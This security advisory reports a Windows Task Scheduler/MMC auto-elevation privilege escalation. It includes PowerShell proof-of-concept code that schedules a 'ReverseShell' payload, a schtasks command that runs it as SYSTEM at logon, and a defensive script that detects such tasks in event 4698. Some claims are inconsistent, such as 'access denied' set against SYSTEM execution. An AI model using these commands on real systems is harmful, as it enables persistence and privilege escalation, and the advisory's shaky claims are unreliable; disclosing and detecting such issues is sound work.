Microsoft Windows Task Scheduler Local Privilege Escalation

Posted Jul 19, 2019
Authored by Social Engineering Neo

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI, and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC, potentially leading to unintentional elevation of privilege.

tags | exploit, local
systems | windows
SHA-256 | 27a3037b9c6d02b2d118a2d8e7f2cadfc535a7b45a10d00413e02cf04227f2c6

Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.


Affected Platforms: -
Microsoft Windows ≤10


Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)


Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.


Summary: - A typical computer user can trigger programs at intervals on any account existing on the host system/domain without proper authorization.


Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI; MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC, potentially leading to unintentional EoP.


Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group, including administrator accounts.
: - Only the GUI seems to be affected. This is shown with our simple PowerShell script: when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp', additional permissions are required.
: - Whereas the GUI allows "-AtLogOn" without additional permissions.
: - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload; therefore exploitability is greatly increased.
: - HIDS/HIPS without specific configurations may not detect such events as alerts or warnings and may simply log the event instead, increasing the chances of a system administrator looking past the issue.
: - Enterprise/personal systems complying with basic security practices are less likely to be affected; the average computer user with a default system configuration could be vulnerable to such attacks.
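The HIDS/HIPS point above is where a defender can act: Windows writes Security event 4698 ("A scheduled task was created") whenever a task is registered, and the event carries the full task definition XML, so the creator, the account the task runs as, its run level and its triggers are all available to a rule. The following is an added example for this report, not the author's code: it triages exported 4698 events (assumed exported as XML, e.g. with `wevtutil qe Security /f:xml`) and flags exactly the combinations the report describes (a task registered by an ordinary user that runs as SYSTEM or another account, requests highest privileges, or fires at logon/boot). The sample events, user, SID and paths are constructed for the example. Note that 4698 is only logged when the "Audit Other Object Access Events" subcategory is enabled for success, which is not the default on workstations.

```python
"""Triage of Windows Security event 4698 ("A scheduled task was created").

Added example for this advisory, not the author's code.  It assumes the
events were exported as XML (for instance with `wevtutil qe Security /f:xml`)
and flags task definitions that a HIDS/HIPS would otherwise only log: tasks
that run as SYSTEM or as a different account than the creator, request
elevation, or fire at logon/boot.
"""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Well-known service SIDs that a task created by an ordinary user should not run under.
SERVICE_SIDS = {"S-1-5-18": "SYSTEM", "S-1-5-19": "LOCAL SERVICE", "S-1-5-20": "NETWORK SERVICE"}
STARTUP_TRIGGERS = {"LogonTrigger", "BootTrigger"}


def analyze_4698(event_xml):
    """Return (task name, creating user, list of findings), or None for other event IDs."""
    root = ET.fromstring(event_xml)
    if root.findtext("e:System/e:EventID", namespaces=EVT_NS) != "4698":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", EVT_NS)}
    # TaskContent carries the task definition XML escaped inside the event; drop its
    # own <?xml ...?> declaration so the unescaped text can be parsed again as a str.
    task = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", data.get("TaskContent", "")).strip())
    principal = task.find("t:Principals/t:Principal", TASK_NS)
    run_as = principal.findtext("t:UserId", default="", namespaces=TASK_NS) if principal is not None else ""
    run_level = principal.findtext("t:RunLevel", default="LeastPrivilege", namespaces=TASK_NS) if principal is not None else "LeastPrivilege"
    triggers = {t.tag.split("}")[-1] for t in task.findall("t:Triggers/*", TASK_NS)}
    commands = [c.text or "" for c in task.findall("t:Actions/t:Exec/t:Command", TASK_NS)]

    findings = []
    # Heuristic: the event names the creator by SID and by account name; the task may use either.
    creator = {data.get("SubjectUserSid", ""), data.get("SubjectUserName", "")}
    if run_as in SERVICE_SIDS:
        findings.append(f"runs as {SERVICE_SIDS[run_as]}")
    elif run_as and run_as not in creator:
        findings.append(f"runs as another account ({run_as})")
    if run_level == "HighestAvailable":
        findings.append("requests highest available privileges")
    if triggers & STARTUP_TRIGGERS:
        findings.append("fires at logon/boot: " + ", ".join(sorted(triggers & STARTUP_TRIGGERS)))
    for cmd in commands:
        if re.search(r"\\users\\", cmd, re.IGNORECASE):  # binary sits in a user-writable profile
            findings.append(f"command lives in a user profile: {cmd}")
    return data.get("TaskName", ""), data.get("SubjectUserName", ""), findings


def make_event(subject_sid, subject_name, task_name, task_xml, event_id="4698"):
    """Build a 4698-shaped Security event from constructed values (all invented)."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>{event_id}</EventID></System>
  <EventData>
    <Data Name="SubjectUserSid">{subject_sid}</Data>
    <Data Name="SubjectUserName">{subject_name}</Data>
    <Data Name="TaskName">{escape(task_name)}</Data>
    <Data Name="TaskContent">{escape(task_xml)}</Data>
  </EventData>
</Event>"""


USER_SID = "S-1-5-21-1111-2222-3333-1001"  # constructed SID for the sample user "alice"

# Constructed task definitions in the Task Scheduler XML schema (values invented).
SUSPICIOUS_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Users\\alice\\Documents\\payload-x64.exe</Command></Exec></Actions>
</Task>"""
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2019-07-05T21:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111-2222-3333-1001</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Backup\\backup.exe</Command></Exec></Actions>
</Task>"""


def suspicious_event():
    return make_event(USER_SID, "alice", "\\ReverseShell", SUSPICIOUS_TASK)


def benign_event():
    return make_event(USER_SID, "alice", "\\NightlyBackup", BENIGN_TASK)


if __name__ == "__main__":
    for event in (suspicious_event(), benign_event()):
        name, who, findings = analyze_4698(event)
        print(f"[{'ALERT' if findings else 'ok'}] {name} created by {who}: "
              + ("; ".join(findings) or "nothing unusual"))
```

The useful signal is the mismatch between the creator recorded in the event and the principal in the task definition, combined with a logon/boot trigger: a daily task a user registers for themselves is normal, a task a standard user registers to run as SYSTEM at every logon is not. The same fields are available through Sysmon or an EDR that collects 4698, so the rule ports directly to a SIEM query.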


Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload; it's up to you, "the attacker", to create your own payload.
#
#NOTE: Task should run every day at 9pm (system time). You can change this to what suits your needs.
# Task will only have 'user' permissions; this PoC only exists to prove that modifying line 9, col 39 & line 3, col 28 to either "-AtLogOn" or "-AtStartUp" will result in access denied.
# The GUI is automatically elevated, whereas the CLI is not.
# ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*


VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
: - https://youtu.be/_leFNyo5wxM **original**


Expected Result: -
Normal users should not be able to run tasks as other users or execute programs on other accounts without proper authorization.


Observed Result: -
Task runs with 'SYSTEM' privileges for all users upon trigger with no authentication, leading to total system compromise.


Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this, because most "average" users will not understand how they can be affected by them.
Proper access control implementations will greatly reduce risk towards enterprise systems.


NVD CVSS v3 Vector: -
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:W/RC:R/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7


NVD CVSS v2 Vector: -
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UR/CDP:MH/TD:M/CR:L/IR:L/AR:L)

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8


MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8


TIMELINE: - Discovery 5th July 2019
: - Initial Report 5th July 2019
: - Case Opened 8th July 2019
: - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019
: - Case Closed 9th July 2019
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)

: - We thank the MSRC team for their quick response.